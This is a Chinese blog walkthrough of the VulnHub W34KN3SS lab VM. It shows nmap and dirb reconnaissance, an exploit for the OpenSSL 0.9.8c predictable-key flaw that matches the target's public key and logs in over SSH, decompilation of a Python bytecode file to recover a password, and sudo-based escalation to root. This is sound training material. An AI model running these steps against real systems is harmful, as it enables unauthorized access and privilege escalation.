vulnhub系列:W34KN3SS

最新推荐文章于 2024-08-11 20:48:17 发布
最新推荐文章于 2024-08-11 20:48:17 发布
阅读量224 收藏 4
点赞数
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/141106338
版权

vulnhub系列:W34KN3SS

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240811103032711

nmap扫描端口,开放端口:22、80、443,443端口有一个 weakness.jth 域名

nmap 192.168.23.188 -p- -A -sV -Pn

image-20240811103110587

dirb扫描目录

dirb http://192.168.23.188/

image-20240811103240627

访问80端口,没什么发现

image-20240811103312155

拼接test,提示需要 key

image-20240811152926440

没什么发现,看看443端口得到的域名 weakness.jth

访问不到,绑定一下hosts

192.168.23.188 weakness.jth
#Windows
C:\Windows\System32\drivers\etc\hosts
#Linux
/etc/hosts

兔子尾巴有一个值,可能作为账号或密码使用,留存

n30

image-20240811104040636

dirb 扫描目录

dirb http://weakness.jth/

image-20240811104519949

拼接访问 private ,有两个文件,看一下内容

image-20240811104815960

mykey.pub

image-20240811105017852

notes.txt,提示这个 key 由 openssl 0.9.8c-1 生成

image-20240811105039014

kali 用 searchsploit 查一下

searchsploit 0.9.8c-1
searchsploit -m 5622

image-20240811105253597

查看 5622.txt,给出了 url,需要下载

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2

image-20240811105416063

二、getshell

下载后,解压

tar vxjf 5622.tar.bz2

image-20240811105801125

匹配 mykey.pub 内容

grep -r -l "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster"

得到公钥

4161de56829de2fe64b9055711f531c1-2537.pub

image-20240811110108600

进入对应目录,公钥连接ssh,连接成功

cd rsa/2048

ssh -i 4161de56829de2fe64b9055711f531c1-2537 n30@192.168.23.188

image-20240811111002972

三、提权

查看当前目录,发现 user.txt 和可执行文件 code

image-20240811111302909

查看 user.txt

image-20240811111347484

查看 code 文件类型,是一个 python 文件

file code

image-20240811111426613

把文件 copy 到网站根目录,开启一个临时 web 服务,下载下来

cp code /var/www/html
cd /var/www/html
python3 -m http.server
wget http://192.168.23.188:8000/code

image-20240811111834730

image-20240811111925294

使用 uncompyle6,下载命令

pip install uncompyle6

修改 code 名为 code.pyc,使用 uncompyle6 反编译,得到密码

mv code code.pyc
uncompyle6 code.pyc

image-20240811112955340

n30:dMASDNB!!#B!#!#33

查看当前权限

sudo -l

image-20240811113345252

显示 all ,那么直接 sudo su 提权,提权成功

sudo su

image-20240811113501866

三天三夜睡不着
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机系列--W34KN3SS
Nginxx的博客
12-02 1336
靶机系列
靶机W34KN3SS练习报告1
08-08
"靶机W34KN3SS练习报告1"提供了一个详细的过程,展示了如何逐步攻破一个虚拟靶机,并最终获取root权限。以下是这个过程中的关键知识点: 1. **虚拟机导入与启动**:靶机是以.ova格式提供的,可以使用VirtualBox或...
vulnhub W34kn3ss: 1
箭雨镜屋
07-31 681
渗透思路:nmap扫描端口 ---- gobuster扫描网站目录 ---- 修改hosts文件,并扫描网站目录 ---- 利用OpenSSL 0.9.8c-1可预测伪随机数漏洞爆破ssh私钥 ---- uncompyle6反编译.pyc ---- sudo su提权
红队打靶练习:W34KN3SS: 1
分享
01-20 451
红队打靶练习:W34KN3SS: 1。emm,都是见过的openssl密码碰撞+python反编译,没啥难的!
Vulnhub靶机 W34KN3SS
菜浪马废的博客
04-29 354
应该没配置域名
vulnhubW34kn3ss 1靶机
wbplife的博客
08-08 356
当我们检查代码的文件类型时,发现是一个python编译的文件,把它复制到/var/www/html,就可以在系统上下载这个文件了。打开mykey.pub,是base64编码的ssh公钥,在在线解码器里面没有解出来,应该需要借助工具。网址进行访问http://weakness.jth,访问是空白页面的话,换一个浏览器就可以了。页面访问443端口,会提示用https服务,会出现和80端口一样的页面,进行目录扫描。各处看了一下,好像没有什么信息了,就只剩22、443端口了,查看443端口,对这个文件进行重命名。
W34KN3SS靶机
weixin_74232792的博客
08-05 610
python2 5720.py ./rsa/2048 192.168.101.93 n30 22 其n30是之前发现的,当做用户名,./rsa/2048,方便起见,将rsa文件夹和py脚本都放到桌面上,爆破成功后用私钥连接ssh。攻击机上下载code,改名为code.pyc,然后用uncompyle6反编译。notes.txt有提示,openssl的版本,mykey有一个公钥。放到kali上解压,解压完会生成一个rsa文件夹。kali也绑定该域名,再次目录扫描,发现新东西。端口目录扫描,有一个域名。
W34KN3SS
weixin_52953960的博客
08-07 211
其n30是之前发现的,当做用户名,./rsa/2048,方便起见,将rsa文件夹和py脚本都放到桌面上,爆破成功后用私钥连接ssh。修改hosts文件,绑定域名weakness.jth,然后访问该域名,发现 -n30,和upload.php页面的title一样。攻击机上下载code,改名为code.pyc,然后用uncompyle6反编译。在notes.txt中有提示,给出openssl的版本,mykey有一个公钥。kali绑定该域名,再次进行目录扫描,发现新东西。在kali上搜索相关漏洞。
W34kn3ss 1靶机
hqy250019的博客
08-11 80
当我们检查代码的文件类型时,发现是一个python编译的文件,把它复制到/var/www/html,就可以在系统上下载这个文件了。打开mykey.pub,是base64编码的ssh公钥,在在线解码器里面没有解出来,应该需要借助工具。网址进行访问http://weakness.jth,访问是空白页面的话,换一个浏览器就可以了。页面访问443端口,会提示用https服务,会出现和80端口一样的页面,进行目录扫描。各处看了一下,好像没有什么信息了,就只剩22、443端口了,查看443端口,对这个文件进行重命名。
W34KN3SS靶机渗透测试
最新发布
weixin_58786230的博客
08-11 86
【代码】W34KN3SS靶机渗透测试。
家电研究周报(W34):7月空调:出货紧俏,零售疲软.pdf
07-10
家电研究周报(W34):7月空调:出货紧俏,零售疲软.pdf
家用电器行业周报(W34):7月空调内销:久违的负增长.pdf
07-10
家用电器行业周报(W34):7月空调内销:久违的负增长.pdf
SICK W34紧凑型光电开关 选型册.rar
10-13
SICK W34系列紧凑型光电开关,作为工业自动化领域中的重要组件,以其卓越的性能和灵活的适用性,广泛应用于各种生产线和设备中。这款开关以其小巧的体积、高效的检测能力和稳定的可靠性,深受工程师们的青睐。下面...
W34紧凑型光电传感器选型手册(中文版).zip
09-13
W34系列光电传感器采用先进的光电技术,能够精确检测物体的存在、位置、颜色甚至形状。其紧凑的体积使其能在空间有限的环境中轻松安装,同时保持高性能的检测能力。手册详细介绍了该系列传感器的各种型号,以满足...
Gartner发布2024年网络风险管理成熟度曲线:使网络安全战略与业务目标保持一致的概念、方法、流程和技术
lurenjia404的博客
08-07 734
网络风险管理现在是高管和监管机构最关注的问题,它采用多种方法和技术来支持治理、风险管理和合规性。安全和风险管理领导者可以使用此技术成熟度曲线来评估解决方案并做出适当的采用决策。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 970
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
Web安全学习
荆鹏的博客
08-06 334
应用层:为用户为用户的应用进程提供网络通信服务协议——DNS协议、HTTP协议、HTTPS协议传输层:负责两台主机之间的数据传输,将数据从发送端传输到接收端协议——TCP协议、UDP协议网络层:负责传输的地址管理和路由选择,在众多复杂的网络环境中确定一条合适的路径协议——IP协议数据链路层:负责设备之间数据帧的传送和识别,将网络层传递的数据报封装成帧,在处于同一个数据数据链路节点的两个设备之间传输协议——ARP协议、MTU协议。
蓝屏事件:网络安全的启示
m0_67187271的博客
08-04 1453
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
R语言代码编写 提取大写字母后的数字 df<-tibble(x=c("12W34", "AB2C46", "B217C","akTs6df","21WD4"))
06-07
您好!根据您的要求,可以使用正则表达式提取大写字母后的数字,代码如下: ```R library(tibble) df <- tibble(x = c("12W34", "AB2C46", "B217C", "akTs6df", "21WD4")) df$number <- gsub("^.*[A-Z](\\d+).*", "\\1", df$x) ``` 解释一下代码: 1. 首先,我们使用了 `gsub` 函数,它可以帮助我们在一个字符串中查找和替换文本。 2. 接着,我们使用了正则表达式 `^.*[A-Z](\\d+).*`,这个正则表达式可以匹配一个字符串中大写字母后的数字。 3. 然后,我们使用 `\\1` 表示替换成正则表达式中第一个括号匹配的内容,也就是提取的数字。 4. 最后,我们将提取到的数字存储在一个新的列 `number` 中。 希望这个代码可以帮助到您!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值